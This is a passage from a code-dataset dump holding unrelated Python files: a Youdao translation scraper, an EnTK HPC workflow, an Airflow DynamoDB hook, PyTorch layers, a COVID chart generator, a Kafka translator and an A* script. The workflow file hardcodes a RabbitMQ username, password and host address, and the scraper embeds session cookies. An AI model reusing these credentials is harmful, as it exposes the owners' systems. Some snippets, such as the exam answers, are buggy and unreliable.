OUTFOX_SEARCH_USER_ID_NCOO=971893961.4325761; OUTFOX_SEARCH_USER_ID=-1480774266@10.169.0.83; JSESSIONID=aaaouUJJcJbTucFMz-8kw; ___rl__test__cookies=1523590284588\",\n \"Host\": \"fanyi.youdao.com\",\n \"Origin\": \"http://fanyi.youdao.com\",\n \"Referer\": \"http://fanyi.youdao.com/\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36\",\n \"X-Requested-With\": \"XMLHttpRequest\"\n }\n\n request = urllib2.Request(base_url, data, headers)\n\n request.add_header('Content-Length', len(data))\n response = urllib2.urlopen(request).read()\n\n return response\n\n\nif __name__ == '__main__':\n html = send_request()\n dict_obj = json.loads(html)\n # 翻译的内容\n print(dict_obj[\"translateResult\"][0][0][\"tgt\"])\n\n","sub_path":"day01_03/day02/5_post_youdao_translate.py","file_name":"5_post_youdao_translate.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"515742905","text":"from radical import entk\nimport os\nimport argparse, sys, math\n\nimport numpy as np\nfrom mocu.utils.utils import *\nfrom mocu.utils.costfunctions import *\nfrom mocu.src.experimentaldesign import *\nfrom mocu.src.mocu_utils import *\nfrom mocu.scripts.example_linearsys import *\n\nclass MOCU(object):\n\n def __init__(self):\n self.set_argparse()\n self._set_rmq()\n self.am = entk.AppManager(hostname=self.rmq_hostname, port=self.rmq_port, username=self.rmq_username, password=self.rmq_password)\n self.p = entk.Pipeline()\n self.s1 = entk.Stage()\n self.s2 = entk.Stage()\n\n def _set_rmq(self):\n self.rmq_port = int(os.environ.get('RMQ_PORT', 5672))\n self.rmq_hostname = os.environ.get('RMQ_HOSTNAME', '129.114.17.185')\n self.rmq_username = os.environ.get('RMQ_USERNAME', 'litan')\n self.rmq_password = os.environ.get('RMQ_PASSWORD', 'sccDg7PxE3UjhA5L')\n\n def set_resource(self, res_desc):\n res_desc[\"schema\"] = \"local\"\n self.am.resource_desc = res_desc\n\n def set_argparse(self):\n parser = argparse.ArgumentParser(description=\"MOCU_EnTK\")\n parser.add_argument(\"--num_run\", \"-n\", help=\"number of OED runs\")\n parser.add_argument(\"--theta\", \"-t\", help=\"value of theta\")\n parser.add_argument(\"--psi\", \"-p\", help=\"value of Psi\")\n parser.add_argument(\"--s\", \"-s\", help=\"value of s\")\n args = parser.parse_args()\n self.args = args\n if args.num_run is None or args.theta is None or args.psi is None or args.s is None:\n parser.print_help()\n sys.exit(-1)\n\n def example_linearsys_py(self, num_run, theta, psi, s):\n\n #os.system(\"mkdir ../MOCU_data\")\n\n for i in range(int(num_run)):#range(1, int(num_exp) + 1):\n t = entk.Task()\n t.pre_exec = [\n \"export INPUT=/gpfs/alpine/csc299/scratch/litan/MOCU/new/mocu/scripts\",\n #\"cd ../MOCU_data; rm -f Ji_*\",\n \"export OMP_NUM_THREADS=1\"\n ]\n t.executable = '/ccs/home/litan/miniconda3/envs/mocu/bin/python3.6'\n t.arguments = ['$INPUT/example_linearsys_stage1.py', '-n{}'.format(num_run), '-i{}'.format(i), '-t{}'.format(theta), '-p{}'.format(psi), '-s{}'.format(s)]\n #t.post_exec = [\"mv Ji_{} ../MOCU_data\".format(i+1)]\n t.post_exec = [\"mv Ji_{}.npy ..\".format(i+1)]\n t.cpu_reqs = {\n 'processes': 1,\n 'process_type': None,\n 'threads_per_process': 4,\n 'thread_type': 'OpenMP'\n }\n '''t.gpu_reqs = {\n 'processes': 1,\n 'process_type': None,\n 'threads_per_process': 1,\n 'thread_type': 'CUDA'\n }'''\n self.s1.add_tasks(t)\n self.p.add_stages(self.s1)\n\n t = entk.Task()\n t.pre_exec = [\n \"export INPUT=/gpfs/alpine/csc299/scratch/litan/MOCU/new/mocu/scripts\",\n \"cd ..\",\n \"export OMP_NUM_THREADS=1\"\n ]\n t.executable = '/ccs/home/litan/miniconda3/envs/mocu/bin/python3.6'\n t.arguments = ['$INPUT/example_linearsys_stage2.py', '-n{}'.format(num_run), '-t{}'.format(theta), '-p{}'.format(psi), '-s{}'.format(s)]\n t.post_exec = [\"rm -f Ji_*.npy\"]\n t.cpu_reqs = {\n 'processes': 1,\n 'process_type': None,\n 'threads_per_process': 4,\n 'thread_type': 'OpenMP'\n }\n '''t.gpu_reqs = {\n 'processes': 1,\n 'process_type': None,\n 'threads_per_process': 1,\n 'thread_type': 'CUDA'\n }'''\n self.s2.add_tasks(t)\n self.p.add_stages(self.s2)\n\n def run(self):\n self.am.workflow = [self.p]\n self.am.run()\n\n\nif __name__ == \"__main__\":\n\n mocu = MOCU()\n n_nodes = math.ceil(float(int(mocu.args.num_run)/41))\n mocu.set_resource(res_desc = {\n 'resource': 'ornl.summit',\n 'queue' : 'batch',\n 'walltime': 120, #MIN\n 'cpus' : 168 * n_nodes,\n 'gpus' : 6 * n_nodes,\n 'project' : 'MED110'\n })\n mocu.example_linearsys_py(num_run=mocu.args.num_run, theta=mocu.args.theta, psi=mocu.args.psi, s=mocu.args.s)\n mocu.run()\n","sub_path":"mocu/graphical_model/mocu_entk.py","file_name":"mocu_entk.py","file_ext":"py","file_size_in_byte":4309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"228799612","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.7-x86_64/egg/airflow/contrib/hooks/aws_dynamodb_hook.py\n# Compiled at: 2019-09-11 03:47:34\n# Size of source mod 2**32: 2370 bytes\nfrom airflow.exceptions import AirflowException\nfrom airflow.contrib.hooks.aws_hook import AwsHook\n\nclass AwsDynamoDBHook(AwsHook):\n __doc__ = '\\n Interact with AWS DynamoDB.\\n\\n :param table_keys: partition key and sort key\\n :type table_keys: list\\n :param table_name: target DynamoDB table\\n :type table_name: str\\n :param region_name: aws region name (example: us-east-1)\\n :type region_name: str\\n '\n\n def __init__(self, table_keys=None, table_name=None, region_name=None, *args, **kwargs):\n self.table_keys = table_keys\n self.table_name = table_name\n self.region_name = region_name\n (super(AwsDynamoDBHook, self).__init__)(*args, **kwargs)\n\n def get_conn(self):\n self.conn = self.get_resource_type('dynamodb', self.region_name)\n return self.conn\n\n def write_batch_data(self, items):\n \"\"\"\n Write batch items to dynamodb table with provisioned throughout capacity.\n \"\"\"\n dynamodb_conn = self.get_conn()\n try:\n table = dynamodb_conn.Table(self.table_name)\n with table.batch_writer(overwrite_by_pkeys=(self.table_keys)) as (batch):\n for item in items:\n batch.put_item(Item=item)\n\n return True\n except Exception as general_error:\n raise AirflowException('Failed to insert items in dynamodb, error: {error}'.format(error=(str(general_error))))","sub_path":"pycfiles/apache_airflow_arup-1.10.5-py3.6/aws_dynamodb_hook.cpython-36.py","file_name":"aws_dynamodb_hook.cpython-36.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"550331360","text":"import logging\nimport sys\n\ngettrace = getattr(sys, 'gettrace', None)\n\n\ndef hexdump(d):\n for i in range(0, len(d), 16):\n data = d[i:i + 16]\n print(\"%08X | %s | %s\" % (i, hex(data).ljust(47), ascii(data)))\n\n\ndef read_file(filename):\n f = open(filename, \"rb\")\n data = f.read()\n f.close()\n return data\n\n\nif gettrace():\n logging.basicConfig(format='%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s',\n level=logging.DEBUG)\nelse:\n logging.basicConfig(format='%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s',\n level=logging.INFO)\nPROGRAM_NAME = \"py_ios_device\"\n","sub_path":"ios_device/util/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"211096173","text":"from typing import Tuple\r\n\r\nfrom utils.utils import get_global_settings, get_time\r\nfrom models.economy_user import EconomyUser\r\nfrom models.logs import *\r\nfrom models.enums import TransactionStatus\r\n\r\n\r\ndef new_transaction(sender: EconomyUser, receptor: EconomyUser, quantity: float, database_name: str, channel_name: str, type: str = 'transferencia') -> Tuple[TransactionStatus, str]:\r\n \"\"\"Hace una transaccion entre usuarios\r\n\r\n Args:\r\n sender (User): Usuario que envia la transaccion\r\n receiver (User): Usuario que recive la transaccion\r\n quantity (float): Monto de la transaccion\r\n data_base_name (str): nombre de la base de datos de mongo\r\n channel_name (str): Nombre del canal\r\n\r\n Returns:\r\n Tuple[str, str]: [status de la transaccion, id de la transaccion]\r\n \"\"\"\r\n\r\n global_settings = get_global_settings()\r\n quantity = round(quantity, global_settings.max_decimals)\r\n\r\n if quantity <= 0.0:\r\n return TransactionStatus.negative_quantity, ''\r\n if sender._id == receptor._id:\r\n return TransactionStatus.sender_is_receptor, ''\r\n\r\n receptor_exists = receptor.get_data_from_db()\r\n sender_exists = sender.get_data_from_db()\r\n\r\n if not sender_exists:\r\n return TransactionStatus.sender_not_exists, ''\r\n if not receptor_exists:\r\n return TransactionStatus.receptor_not_exists_not_exists, ''\r\n\r\n if sender.balance.value < quantity:\r\n return TransactionStatus.insufficient_coins, ''\r\n\r\n # Se hace la transacción\r\n sender.balance -= quantity\r\n receptor.balance += quantity\r\n\r\n # # Se hace el log de la transaccion\r\n transaction_log = TransactionLog(\r\n get_time(), type, sender, receptor, quantity, channel_name)\r\n transaccion_id = transaction_log.send_log_to_db(database_name)\r\n\r\n return TransactionStatus.succesful, transaccion_id\r\n","sub_path":"core/transactions.py","file_name":"transactions.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"461764616","text":"import torch.nn as nn\nimport torch.nn.functional as F\n\n\ndef conv(in_channels, out_channels, kernel_size, stride=2, padding=1, batch_norm=False, instance_norm=False):\n layers = []\n conv_layer = nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=kernel_size, stride=stride,\n padding=padding, bias=False)\n layers.append(conv_layer)\n if batch_norm:\n layers.append(nn.BatchNorm2d(out_channels))\n if instance_norm:\n layers.append(nn.InstanceNorm2d(out_channels))\n return nn.Sequential(*layers)\n\n\ndef deconv(in_channels, out_channels, kernel_size, stride=2, padding=1, batch_norm=False, instance_norm=False,\n dropout=False, dropout_ratio=0.5):\n layers = []\n layers.append(nn.ConvTranspose2d(in_channels, out_channels, kernel_size, stride, padding, bias=False))\n if batch_norm:\n layers.append(nn.BatchNorm2d(out_channels))\n if instance_norm:\n layers.append(nn.InstanceNorm2d(out_channels))\n if dropout:\n layers.append(nn.Dropout2d(dropout_ratio))\n\n return nn.Sequential(*layers)\n\n\nclass ResidualBlock(nn.Module):\n\n def __init__(self, conv_dim):\n super(ResidualBlock, self).__init__()\n\n self.conv1 = conv(in_channels=conv_dim, out_channels=conv_dim, kernel_size=3, stride=1, padding=1,\n instance_norm=True)\n self.conv2 = conv(in_channels=conv_dim, out_channels=conv_dim, kernel_size=3, stride=1, padding=1,\n instance_norm=True)\n\n def forward(self, x):\n out_1 = F.relu(self.conv1(x))\n out_2 = x + self.conv2(out_1)\n return out_2\n","sub_path":"auxiliary_func.py","file_name":"auxiliary_func.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"256238033","text":"from __future__ import division\nfrom PIL import Image, ImageDraw, ImageFont\nimport pandas as pd \nfrom datetime import date, timedelta\n\nyesterday = date.today() - timedelta(days = 2)\nbeforeyesterday = date.today() - timedelta(days = 3)\nbbyesterday = date.today() - timedelta(days = 4)\n\n\nurl = 'https://raw.githubusercontent.com/nytimes/covid-19-data/master/us-states.csv'\ndf = pd.read_csv(url, error_bad_lines=False)\nindex = df.index\nlength = len(index)\n\nfor x in range(2,length):\n\tif str(df.loc[x][0]) == str(yesterday):\n\t\tif str(df.loc[x][1]) == \"New Jersey\":\n\t\t\tcases = df.loc[x][3]\n\t\t\tdeaths = df.loc[x][4]\n\telif str(df.loc[x][0]) == str(beforeyesterday):\n\t\tif str(df.loc[x][1]) == \"New Jersey\":\n\t\t\toldcases = df.loc[x][3]\n\t\t\tolddeaths = df.loc[x][4]\n\telif str(df.loc[x][0]) == str(bbyesterday):\n\t\tif str(df.loc[x][1]) == \"New Jersey\":\n\t\t\tbeforeoldcases = df.loc[x][3]\n\t\t\tbeforeolddeaths = df.loc[x][4]\n\n\nurl2 = 'https://raw.githubusercontent.com/nytimes/covid-19-data/master/us.csv'\ndfUS = pd.read_csv(url2, error_bad_lines=False)\nindexUS = dfUS.index\nlengthUS = len(indexUS)\n\nfor y in range(2,lengthUS):\n\tif str(dfUS.loc[y][0]) == str(yesterday):\n\t\tUScases = dfUS.loc[y][1]\n\n\nnewcases = cases - oldcases\nnewdeaths = deaths - olddeaths\npercent = cases/oldcases\nif percent < 1:\n\tincdec = \"increase\"\n\tpercent = round(1-percent,2)\nelse:\n\tpercent = round(percent-1,2)\n\tincdec = \"decrease\"\n\n\nimg = Image.new('RGB', (1080,1350), color = \"white\")\ndraw = ImageDraw.Draw(img)\n\nfnt = ImageFont.truetype('/Library/Fonts/Arial Rounded Bold.ttf', 120)\nfnt2 = ImageFont.truetype('/Library/Fonts/Arial Rounded Bold.ttf', 60)\nfnt3 = ImageFont.truetype('/Library/Fonts/Arial Rounded Bold.ttf', 30)\ntext = \"Yesterday there were \" + str(newcases) + \"\\n\\nnew cases of COVID-19 \\n\\nreported in New Jersey, \\n\\nthat is a \" + str(percent) + \"% \" + incdec + \" in \\n\\ncases. This brings us to a total \\n\\nof \" + str(cases) + \" COVID-19 cases in \\n\\nNew Jersey and \" + str(UScases) + \" cases \\n\\nnationwide\"\n\ndraw.text((10,10), \"Today's COVID-19 \\nUpdate:\", font=fnt, fill=(226,62,89))\ndraw.text((40,350), text, font=fnt2, fill=(98,98,98))\ndraw.text((500,1300), \"Source: NY Times COVID-19 Data\", font=fnt3, fill=(0,0,0))\n\nimg.save('post.png')\n\n\n\n","sub_path":"getData.py","file_name":"getData.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"640205874","text":"#!/usr/bin/env python\nimport json\nimport time\n\nfrom PIL import Image\n\nfrom functions import (\n chunk_str,\n connect_redis,\n double_mult,\n get_contract,\n get_default_tile,\n get_default_url,\n get_for_sale_tile,\n get_position,\n hex_to_rgb,\n)\n\n\ndef render_tile(location):\n # Connect to Redis and Blockchain\n redis_server = connect_redis()\n contract = get_contract()\n\n # Get Tile Data\n try:\n tile = contract.functions.tiles(location).call()\n except Exception as e:\n print(e)\n print(\n \"Can't connect to Parity, or !synced to block #2641527. Waiting 5 seconds...\"\n )\n tile = False\n while not tile:\n try:\n tile = contract.functions.tiles(location).call()\n except Exception as e:\n time.sleep(5)\n print(\n \"Can't connect to Parity, or !synced to block #2641527. \\\n Waiting 5 seconds...\"\n )\n print(e)\n tile = False\n\n owner = tile[0]\n url = tile[2]\n image = tile[1]\n price = tile[3]\n tile_name = str(location)\n print(\"Rendering \" + tile_name + \"...\")\n # Defaults if data not set.\n if not url:\n url = get_default_url()\n if not image:\n image = get_default_tile(owner)\n image = image.strip()\n if not len(image) == 768:\n image = get_default_tile(owner)\n if price != 0:\n image = get_for_sale_tile()\n \n # Update Redis Data\n redis_server.hmset(tile_name, {\"owner\": owner, \"url\": url})\n # Render Image from Image Data. Every 3 char. represents 1 pixel.\n rgb_image_data = []\n for pixel in chunk_str(image, 3):\n rgb_image_data.append(hex_to_rgb(double_mult(pixel)))\n\n # Start with Black Image\n rendered_image = Image.new(\"RGB\", (16, 16), \"black\")\n pixels = rendered_image.load()\n\n # For every pixel in image:\n for i in range(rendered_image.size[0]):\n for j in range(rendered_image.size[1]):\n pixel = rgb_image_data[get_position(i, j)]\n pixels[i, j] = (pixel[0], pixel[1], pixel[2])\n\n # Save Tile\n rendered_image.save(\"tiles/\" + tile_name + \".png\")\n\n # Make big tile for OpenSea\n big_tile = rendered_image.resize((350, 350), Image.NEAREST)\n big_tile.save(\"large_tiles/\" + tile_name + \".png\")\n\n data = {\n \"description\": \"Official PixelMap (2016) Wrapper\",\n \"external_url\": url,\n \"image\": f\"https://s3.us-east-1.amazonaws.com/pixelmap.io/{tile_name}.png\",\n \"name\": f\"Tile #{tile_name}\",\n }\n\n with open(f\"large_tiles/{tile_name}.json\", \"w\") as outfile:\n json.dump(data, outfile, indent=4)\n","sub_path":"render_tile.py","file_name":"render_tile.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"238290434","text":"from os import environ\nfrom translation_manager import TranslationManager\nfrom abstract_translator import \\\n MessageTranslator, MessageTranslatorUserDefinedFunctions, MessageTranslatorPathManipulation\nfrom json import load\n\nif __name__ == \"__main__\":\n SOURCE_FORMAT = environ.get('SOURCE_FORMAT', 'json')\n TARGET_FORMAT = environ.get('TARGET_FORMAT', 'xml')\n OPERATION = environ.get('OPERATION', 'format_translation')\n SCRIPT_FILE = environ.get('SCRIPT_FILE', '')\n FUNCTION_NAME = environ.get('FUNCTION_NAME', '')\n PATHS_FILE = environ.get('PATHS_FILE', '')\n\n SOURCE_TOPIC = environ.get('SOURCE_TOPIC', 'test')\n TARGET_TOPIC = environ.get('TARGET_TOPIC', 'neu')\n KAFKA_BROKER = environ.get('KAFKA_BROKER', 'localhost:9092')\n\n print(f'Starting translation from \"{SOURCE_FORMAT}\" to \"{TARGET_FORMAT}\".')\n print(f'Subscribing to kafka broker \"{KAFKA_BROKER}\" topic \"{SOURCE_TOPIC}\".')\n print(f'Publishing translated messages on topic \"{TARGET_TOPIC}\"')\n\n translator = MessageTranslator.get_translator(SOURCE_FORMAT, TARGET_FORMAT, OPERATION)\n if isinstance(translator, MessageTranslatorUserDefinedFunctions) and SCRIPT_FILE != '':\n with open(SCRIPT_FILE, 'r') as file:\n script = file.read()\n translator.set_script(script, FUNCTION_NAME)\n if isinstance(translator, MessageTranslatorPathManipulation) and PATHS_FILE != '':\n with open(PATHS_FILE, 'r') as file:\n paths = load(file)\n translator.set_element_paths(paths)\n\n manager = TranslationManager([KAFKA_BROKER], SOURCE_TOPIC, TARGET_TOPIC, translator)\n try:\n manager.start_consuming()\n except KeyboardInterrupt:\n print('exiting program')\n","sub_path":"translator/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"642013975","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport _thread\nimport time\nfrom neurons_engine import response_distributor\nfrom neurons_engine import neurons_heartbeat_func\nfrom neurons_engine import neuron_request_bind_phy\n\n# Note!!!!!!!!!!\n # find thread stack config in app/config.py \n\nNEURONS_PROTOCOL_HEAD = const(0xf0)\nNEURONS_PROTOCOL_END = const(0xf7)\n\n_FSM_STA_NONE = const(0)\n_FSM_STA_HEAD = const(1)\n_FSM_STA_DATA = const(2)\n_FSM_STA_CHECKSUM = const(3)\n_FSM_STA_END = const(4)\n\n\ndef create_f0f7_frame(data):\n frame = [0xf7]\n check_sum = 0\n for item in data:\n check_sum += item\n check_sum &= 0x7F\n\n frame.extend(data)\n frame.append(check_sum)\n frame.append(0xf7)\n\nclass _F0F7_frame:\n def __init__(self):\n self._frame_buf = [0] * 256\n self._data_in_index = 0\n self._check_sum = 0\n self._fsm_status = _FSM_STA_NONE\n \n self._frame_process = None\n\n def _frame_parse(self, data):\n for i in range(len(data)):\n if data[i] == NEURONS_PROTOCOL_HEAD:\n self._fsm_status = _FSM_STA_DATA\n self._data_in_index = 0\n elif data[i] == NEURONS_PROTOCOL_END:\n self._check_sum = 0\n for j in range(self._data_in_index):\n self._check_sum += self._frame_buf[j]\n self._check_sum &= 0x7F\n\n if self._check_sum == self._frame_buf[self._data_in_index - 1]:\n if self._frame_process:\n _frame_process(self._frame_buf[0:self._data_in_index])\n\n elif self._fsm_status == _FSM_STA_DATA:\n self._frame_buf[self._data_in_index] = data[i]\n self._data_in_index += 1\n\n def _register_frame_process(self, func):\n self._frame_process = func\n\nclass neurons_protocol:\n def __init__(self):\n neuron_request_bind_phy(__neurons_engine_send_frame)\n _frame_c = _F0F7_frame()\n _frame_c._register_frame_process(self.parse_frame)\n\n def parse_frame(frame, channel_info = bytes([0x01,0x00,0x00,0x00])):\n response_distributor(frame, channel_info, 0x00)\n\n\n#####################################################\ndef __neurons_engine_send_frame(frame, copo = -1):\n uart_B.write(create_f0f7_frame(frame))\n\nneuron_request_bind_phy(__neurons_engine_send_frame)\n\nneurons = neurons_protocol()\n\nfrom fpioa_manager import fm, board_info\nfrom machine import UART\nimport utime\n\ndef uart_rec_task():\n pre_time = utime.ticks_ms()\n\n while True:\n read_data = uart_B.read()\n if None != read_data:\n neurons._frame_c._frame_parse(read_data)\n continue\n\n if utime.ticks_ms() - pre_time > 500:\n neurons_engine.neurons_heartbeat_func()\n pre_time = utime.ticks_ms()\n\n utime.sleep(0.01)\n\ndef uart_rec_start():\n fm.register(board_info.PIN9,fm.fpioa.UART2_TX)\n fm.register(board_info.PIN10,fm.fpioa.UART2_RX)\n uart_A = UART(UART.UART1, 921600, 8, None, 1, timeout=1000, read_buf_len=4096)\n uart_B = UART(UART.UART2, 921600, 8, None, 1, timeout=1000, read_buf_len=4096)\n\n _thread.start_new_thread(uart_rec_task, ())\n","sub_path":"src/neurons_engine/neurons_protocol/neurons_protocol_parse.py","file_name":"neurons_protocol_parse.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"584637554","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 17 13:09:32 2015\n\n@author: Jack\n\"\"\"\n# Answer script to the 2012/13 Python exam - 17.12.2015\nimport scipy.interpolate\nimport numpy\n\n\ndef mult3vec(c, v):\n \"\"\"Returns the product of three vectors v1, v2 and v3 multiplied by a\n scalar c\"\"\"\n for i in v:\n i = c * i\n return v\n\n\ndef multvec(c, v):\n \"\"\"Returns the product of n vectors v1, v2...vn multiplied by a scalar c\"\"\"\n for i in v:\n i = c * i\n return v\n\n\ndef convert_time(t):\n \"\"\"Returns the number of days, hours and minutes in a value of minutes t\"\"\"\n secs = 60 * t\n minutes = int(secs / 60) % 60\n hours = int(secs / 3600)\n days = int(secs / (3600*24))\n return days, hours, minutes\n\n\ndef nearest(xs, a):\n \"\"\"Returns the element of xs that is nearest to a\"\"\"\n value_list = []\n for i in xs:\n value_list.append(abs(i - a))\n mini = min(value_list)\n for j in xs:\n if mini + a == j:\n return j\n elif mini * -1 + a == j:\n return j\n else:\n pass\n\n\ndef derivative(f, xs):\n \"\"\"Approximates and returns the derivative of a function f at points in\n xs\"\"\"\n delta = 10 ** -6\n returnlist = []\n for i in xs:\n f1 = f(i + delta)\n f2 = f(i)\n returnlist.append((f1 - f2) / delta)\n return returnlist\n\n\ndef read(filename):\n \"\"\"Reads and returns a tuple of two lists the data of a file filename\"\"\"\n data0 = open(filename)\n data1 = read(data0)\n data0.close\n data1.split(',')\n print(data1)\n\n\ndef isfib(F):\n \"\"\"Returns true and false given a list F whether or not it is a Fibonacci\n sequence\"\"\"\n if len(F) < 2:\n return False\n elif F[0] == 0 and F[1] == 1:\n for i in range(2, len(F)):\n if F[i] == F[i - 1] + F[i - 2]:\n return True\n else:\n return False\n else:\n return False\n\n\ndef f_from_data(xs, ys):\n \"\"\"Returns a bunch of stuff\"\"\"\n ys_array = numpy.array(ys)\n\n def returner(x):\n return x\n\n def f(x):\n for i in xs:\n if x == i:\n return ys[i]\n else:\n newval = scipy.interpolate.interp1d(nearest(xs, x), ys_array)\n return newval\n return f(x)\n","sub_path":"2012-13.py","file_name":"2012-13.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"161415801","text":"# coding:utf-8\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom node import get_node,init_dict_node,calDistance\n#读取csv文件\n#\nimport csv\nimport math\n\n# N*N 数组\n#{'link':0,'G':0,'H':0,'F':0,'label':'t_1_2','cood':(121,222)}\n# NODE_LINK = [[{'label':'a','link':0,'parent':'start','G':0,'H':0,'F':0},{'label':'b','link':1,'parent':'start','G':2,'H':2,'F':0},{'label':'c','link':1,'parent':'start','G':1,'H':1,'F':0},{'label':'d','link':0,'parent':'start','G':0,'H':3.5,'F':0},{'label':'e','link':0,'parent':'start','G':0,'H':8.5,'F':0}],\n# [{'label':'a','link':1,'parent':'start','G':2,'H':2,'F':0},{'label':'b','link':0,'parent':'start','G':0,'H':0,'F':0},{'label':'c','link':0,'parent':'start','G':0,'H':2.8,'F':0},{'label':'d','link':1,'parent':'start','G':4,'H':4'F':0},{'label':'e','link':0,'parent':'start','G':0,'H':8,'F':0}],\n# [{'label':'a','link':1,'parent':'start','G':1,'H':1,'F':0},{'label':'b','link':1,'parent':'start','G':2,'H':2,'F':0},{'label':'c','link':1,'parent':'start','G':1,'H':1,'F':0},{'label':'d','link':0,'parent':'start','G':0,'H':3.5,'F':0},{'label':'e','link':0,'parent':'start','G':0,'H':8.5,'F':0}],\n# [{'label':'a','link':0,'parent':'start','G':0,'H':0,'F':0},{'label':'b','link':1,'parent':'start','G':2,'H':2,'F':0},{'label':'c','link':1,'parent':'start','G':1,'H':1,'F':0},{'label':'d','link':0,'parent':'start','G':0,'H':3.5,'F':0},{'label':'e','link':0,'parent':'start','G':0,'H':8.5,'F':0}],\n# [{'label':'a','link':0,'parent':'start','G':0,'H':0,'F':0},{'label':'b','link':1,'parent':'start','G':2,'H':2,'F':0},{'label':'c','link':1,'parent':'start','G':1,'H':1,'F':0},{'label':'d','link':0,'parent':'start','G':0,'H':3.5,'F':0},{'label':'e','link':0,'parent':'start','G':0,'H':8.5,'F':0}]]\n# #节点中的实际距离\nNODE_LINK = init_dict_node()\n#标签转成维度id\ndict_node = get_node() # {'t_1_1':{'coord':(12,22),'id':0},'t_1_2':{'coord':(5,12),'id':1},'t_1_3':{'coord':(6,8),'id':2},'t_1_4':{'coord':(1,12),'id':3},'t_1_5':{'coord':(1,18),'id':4},'F_1_1':{'coord':(15,12),'id':5},'F_1_2':{'coord':(15,22),'id':6}}\n\nparent_node = {}\nNODE_DISTANCE_G = [[0,0,12],\n [22,0,21]]\n# 节点中得欧式距离\nNODE_DISTANCE_H = [[0,0,12],\n [22,0,21]]\n\nNODE_DISTANCE_F = [[0,0,12],\n [22,0,21]]\n#已近访问的节点\nvisited = []\n\n\nstartNode = (121,22)\ntargetNode = (12,222)\nstart_node_id = 0\ntarget_node_id = 50\n\n\nLAMBDAH = 2.0\n\n# for key in labelToId:\n# \t# print(key,labelToId[key])\n# \topenList = []\n# \tclosedList =[]\n# \troute = []\n# \tcur_node_id = labelToId[key] \n# \tnode_link_arr = NODE_LINK_DISTANCE[cur_node_id]\n# \t# 存储连接的节点ID\n# \tnode_link = {}\n# \t# node_link_value = []\n# \tfor item in node_link_arr:\n# \t\t# print(item)\n# \t\tif item != 0:\n# \t\t\tlink_node_id = node_link_arr.index(item)\n# \t\t\tnode_link.append()\n# \t\t\tlink_node_f = f(cur_node_id,link_node_id,target_node_id)\n# \t\t\tnode_link_value[link_node_id] = link_node_f\n\n# \tnode_link_sorted = sorted(node_link.items(), key=lambda x: x[1])\n\n# \tmove_node = node_link_sorted[0]\n# \tmove_node_id = move_node[0]\n\n\n# \t# if len(node_link) == 0:\n# \t\t# pass\n# \t\t# TODO \n\t\n# \tf = f(cur_node_id,link_node_id,target_node_id)\n\n# a) 寻找开启列表中F值最低的格子。我们称它为当前格。\n\n# b) 把它切换到关闭列表。\n\n# c) 对相邻的格中的每一个?\n\n# * 如果它不可通过或者已经在关闭列表中,略过它。反之如下。\n\n# * 如果它不在开启列表中,把它添加进去。把当前格作为这一格的父节点。记录这一格的F,G,和H值。\n\n# * 如果它已经在开启列表中,用G值为参考检查新的路径是否更好。更低的G值意味着更好的路径。如果是这样,就把这一格的父节点改成当前格,并且重新计算这一格的G和F值。如果你保持你的开启列表按F值排序,改变之后你可能需要重新对开启列表排序。\n\n# d) 停止,当你\n\n# * 把目标格添加进了关闭列表(注解),这时候路径被找到,或者\n\n# * 没有找到目标格,开启列表已经空了。这时候,路径不存在。\n# \n\n\ndef astar(start_node_label,target_node_label):\n\tstart_node_id = dict_node[start_node_label]['id']\n\ttarget_node_id = dict_node[target_node_label]['id']\n\topenList = []\n\tclosedList =[]\n\troute = []\n\tcur_node_id = start_node_id\n\tprint('start_node_id',start_node_id)\n\tprint('target_node_id',target_node_id)\n\tNODE_LINK[start_node_id][start_node_id]['parent'] = 'startNode'\n\topenList.append(start_node_id)\n\tfound = False \n\tresign = False \n\tcount = 0\n\n\twhile not found and not resign:\n\n\t\t# print('next step openList:',openList,'closedList:',closedList)\n\n\t\tnode_link_value = {}\n\t\tif cur_node_id == target_node_id:\n\t\t\t\n\t\t\tprint('========================================fuck! I found it=============================================')\n\t\t\t\n\t\t\tfound = True\n\t\t\troute = getRoute(start_node_id,target_node_id)\n\t\t\t# print('route',route)\n\t\t\tbreak\n\n\t\t# print('cur_node_id node index',openList.index(cur_node_id))\n\t\t#从开启列表移除当前节点\n\t\tdel 